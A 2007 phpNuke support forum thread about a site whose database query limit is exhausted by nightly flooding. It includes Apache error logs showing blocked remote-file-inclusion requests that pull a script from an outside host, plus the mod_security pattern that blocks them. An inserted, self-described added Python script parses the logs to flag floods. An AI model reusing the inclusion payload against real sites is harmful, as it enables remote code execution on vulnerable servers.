Ravens PHP Scripts: Forums
Fluke
Hangin' Around
Joined: Oct 24, 2003
Posts: 32
Posted: Mon Oct 15, 2007 8:07 am

Yes, they are attacking my site somehow, flooding the SQL user with > 50,000 queries. Our host only supports 50,000 max queries, and what is happening is some IP-spoofing ass is constantly flooding our site. I get up in the morning and we have some funky SQL error. I try a few pages and then I get the message that the user has exceeded the limit.

I have everything in Sentinel turned up; it's also the latest version, and yet they still seem to be flooding our site. Maybe I can set up Sentinel a little further or something, but even so, the last user who I see attacking is like going to modules.php or doing funky searches. I've already barred guests from searching...

This goes on from like 1am to almost 7am, basically just before I get up in the morning. I have to then create yet another SQL user and update the config.cfg... Getting ridiculous.

[Mon Oct 15 01:12:31 2007] [error] [client 81.179.119.135] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)(.+)\\\\.(c|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp)\\\\?" at REQUEST_URI [hostname "www.frontlineforce2.com"] [uri "/content/modules.php?name=http://amyru.h18.ru/images/cs.txt?"]
[Mon Oct 15 01:12:33 2007] [error] [client 81.179.119.135] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)(.+)\\\\.(c|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp)\\\\?" at REQUEST_URI [hostname "www.frontlineforce.com"] [uri "/content/modules.php?name=http://amyru.h18.ru/images/cs.txt?"]
[Mon Oct 15 01:12:41 2007] [error] [client 81.179.119.135] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)(.+)\\\\.(c|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp)\\\\?" at REQUEST_URI [hostname "www.frontlineforce2.com"] [uri "/content/modules.php?name=http://amyru.h18.ru/images/cs.txt?"]
[Mon Oct 15 01:13:17 2007] [error] [client 81.179.119.135] mod_security: Access denied with code 406. Pattern match "=(http|www|ftp)(.+)\\\\.(c|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp)\\\\?" at REQUEST_URI [hostname "www.frontlineforce.com"] [uri "/content/modules.php?name=http://amyru.h18.ru/images/cs.txt?"]
[Mon Oct 15 01:15:50 2007] [error] [client 72.30.61.80] File does not exist: /home/frontli1/public_html/files/TEKKEN5-DR.html
[Mon Oct 15 01:17:11 2007] [error] [client 194.8.176.2] File does not exist: /home/frontli1/public_html/forums/index.php
[Mon Oct 15 01:18:33 2007] [error] [client 218.58.136.4] File does not exist: /home/frontli1/public_html/forums/index.php
[Mon Oct 15 01:19:39 2007] [error] [client 83.130.251.189] File does not exist: /home/frontli1/public_html/forums/index.php
[Mon Oct 15 01:24:29 2007] [error] [client 74.6.22.39] File does not exist: /home/frontli1/public_html/forums/lofiversion/index.php/t1067.html
[Mon Oct 15 01:32:03 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:04 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:05 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:05 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:07 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:09 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:10 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:10 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:11 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:13 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:15 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php
[Mon Oct 15 01:32:15 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/frontli1/public_html/content/modules.php

Client denied, yet it seems to take down our SQL user and I have to create a new one because the host only allows a maximum of 50,000 queries at a time.

Also, IP lookup says it's Microsoft / MSN!!??? wtf!
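One way to pull the flooding client out of error_log lines like the ones quoted above: parse each line, tag what blocked it (mod_security rule, Apache Deny rule, missing file), and flag any client whose hits cluster into a burst. This is an added example, not code from the post or from NukeSentinel; the sample log is constructed from the post's client IPs and timings, with the messages shortened and placeholder paths.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache 2.x error_log line layout, as quoted in the post: [date] [level] [client ip] message
LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] \[\w+\] \[client (?P<ip>[\d.]+)\] (?P<msg>.*)$")
TS_FMT = "%a %b %d %H:%M:%S %Y"
KINDS = [("mod_security:", "modsec_block"),                           # a mod_security rule fired
         ("client denied by server configuration", "access_denied"),  # an Apache Deny rule fired
         ("File does not exist", "not_found")]

# Constructed sample: client IPs and timestamps mirror the post's excerpt, messages are
# shortened and the paths are placeholders (this is not a real log).
SAMPLE_LOG = "\n".join(
    [f"[Mon Oct 15 01:{t} 2007] [error] [client 81.179.119.135] mod_security: Access denied with code 406."
     for t in ("12:31", "12:33", "12:41", "13:17")]
    + [f"[Mon Oct 15 01:32:{s:02d} 2007] [error] [client 65.55.213.7] client denied by server configuration: /home/PLACEHOLDER/content/modules.php"
       for s in (3, 4, 5, 5, 7, 9, 10, 10, 11, 13, 15, 15)])

def parse_line(line):
    """Return (timestamp, client_ip, kind) for a recognised error_log line, else None."""
    if not (m := LINE_RE.match(line)):
        return None
    kind = next((k for prefix, k in KINDS if m["msg"].startswith(prefix)), "other")
    return datetime.strptime(m["ts"], TS_FMT), m["ip"], kind

def max_burst(times, window):
    """Largest number of events from one client that fall inside any sliding time window."""
    best = start = 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best

def flood_report(log_text, window=timedelta(seconds=60), threshold=10):
    """Per client: how many blocked requests of each kind, worst burst, and a flood flag."""
    per_ip = defaultdict(list)
    for ev in filter(None, map(parse_line, log_text.splitlines())):
        per_ip[ev[1]].append(ev)
    report = {}
    for ip, evs in per_ip.items():
        kinds = defaultdict(int)
        for _, _, kind in evs:
            kinds[kind] += 1
        burst = max_burst(sorted(ts for ts, _, _ in evs), window)
        report[ip] = {"total": len(evs), "kinds": dict(kinds), "burst": burst, "flood": burst >= threshold}
    return report
```

The flagged entries (here 65.55.213.7, twelve denied hits in twelve seconds) are what to hand to the host for a firewall or rate limit, since a denial logged by Apache still costs a request and, on phpNuke, usually a query.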
Fluke
Posted: Mon Oct 15, 2007 9:14 am

OK, why in Admin is it saying my Sentinel is up to date at 2.5.08 when 2.5.13 is available? Can I follow the readme simply to upgrade? That's a bug I imagine, since it didn't pick up a later version that fixes SQL injections.... Sigh.
 
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
Posted: Mon Oct 15, 2007 10:33 am

Even with mod_security, it looks like they are hammering your site. Even an updated Nuke Sentinel won't stop it; Sentinel requires SQL queries to function.

You'll really need to work with your host on stopping such denial of service.
Or get a better host; a 50,000 query limit is just not acceptable for a database-intensive script like phpNuke.

_________________
- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
Fluke
Posted: Mon Oct 15, 2007 10:38 am

Isn't there a way I could redirect anyone trying to hit /home/frontli1/public_html/content/modules.php directly?

My understanding is that 2.5.13 is more secure than 2.5.08, yes? No? SQL injection, etc.
 
evaders99
Posted: Mon Oct 15, 2007 3:17 pm

modules.php is the major file phpNuke uses. There is no way you could disable it and still have your site functioning.

There are some security issues with previous versions. You should still upgrade your Nuke Sentinel version. However, its flood protection will not stop the hits to your server.
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours